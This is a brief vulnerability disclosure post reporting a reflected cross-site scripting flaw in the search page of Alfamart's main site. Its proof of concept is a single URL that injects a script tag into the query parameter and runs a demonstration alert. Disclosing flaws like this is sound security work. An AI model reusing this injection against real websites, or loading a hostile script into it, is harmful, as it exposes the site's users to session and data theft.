[+] Title: ALFAMART | Cross Site Scripting (XSS)
[+] Author: abay
Description
------------------------------------------
PT Sumber Alfaria Trijaya Tbk or Alfamart is a primarily franchised chain of convenience stores from Indonesia,
with over 10,000 stores across Southeast Asia. Yesterday I submitted the same bug, but on the subdomain.
This time, I found another one in the main domain.
Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
https://alfamartku.com/search/results?q=1'<script>alert('XSS by abaykandotocom');</script>
Best regards,
Abay.